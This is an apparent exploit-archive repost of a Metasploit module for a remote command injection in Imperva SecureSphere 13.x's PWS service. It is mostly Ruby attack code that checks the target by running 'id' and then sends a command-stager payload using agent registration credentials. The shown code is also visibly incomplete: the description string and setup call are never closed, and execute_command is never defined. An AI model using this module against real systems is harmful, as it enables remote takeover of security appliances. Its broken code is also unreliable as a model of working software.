Exploits / Vulnerability Discovered : 2019-03-07 |
Type : remote |
Platform : linux
This exploit / vulnerability Imperva securesphere 13.x pws command injection (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Imperva SecureSphere PWS Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in Imperva
SecureSphere 13.x. The vulnerability exists in the PWS service,
where Python CGIs didn't properly sanitize user supplied command
parameters and directly passes them to corresponding CLI utility,
leading to command injection. Agent registration credential is
required to exploit SecureSphere in gateway mode.
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']),
OptString.new('PASSWORD', [false, 'Agent registration password', '']),
OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])
])
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end
def check
begin
res = execute_command('id')
rescue => e
vprint_error("#{e}")
return CheckCode::Unknown
end
if res.body =~ /uid=\d+/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def exploit
unless CheckCode::Vulnerable == check
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning 'Target does not appear to be vulnerable'
end
print_status("Sending payload #{datastore['PAYLOAD']}")
execute_cmdstager
end